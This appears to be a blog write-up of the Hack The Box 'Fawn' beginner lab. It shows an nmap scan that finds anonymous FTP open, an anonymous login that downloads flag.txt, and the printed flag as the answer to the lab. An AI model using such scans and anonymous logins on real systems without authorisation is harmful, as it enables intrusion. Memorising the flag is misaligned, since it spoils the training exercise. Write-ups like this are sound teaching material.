Post

Fawn

Posted
Preview Image
By Oste
2 min read

What does the 3-letter acronym FTP stand for?

file transfer protocol

What communication model does FTP use, architecturally speaking?

client-server model

filezilla

Which port is the FTP service active on usually?

21 tcp

What acronym is used for the secure version of FTP?

sftp

What is the command we can use to test our connection to the target?

ping

From your scans, what version is FTP running on the target?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

➜  nmap -sC -sV -p- -T4 10.129.154.74
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-22 07:31 EST
Nmap scan report for 10.129.154.74 (10.129.154.74)
Host is up (0.24s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.14.39
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 828.50 seconds

vsftpd 3.0.3

From your scans, what OS type is running on the target?

Unix

Submit root flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

➜  ftp 10.129.154.74
Connected to 10.129.154.74.
220 (vsFTPd 3.0.3)
Name (10.129.154.74:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
226 Directory send OK.
ftp> get flag.txt
local: flag.txt remote: flag.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for flag.txt (32 bytes).
226 Transfer complete.
32 bytes received in 0.00 secs (53.8793 kB/s)
ftp> exit
221 Goodbye.
➜  cat flag.txt
035db21c881520061c53e0536e44f815#

HTB{035db21c881520061c53e0536e44f815}

HTB, Starting Point, Tier 0
linux ftp ftp-anon
This post is licensed under CC BY 4.0 by the author.

Comments powered by Disqus.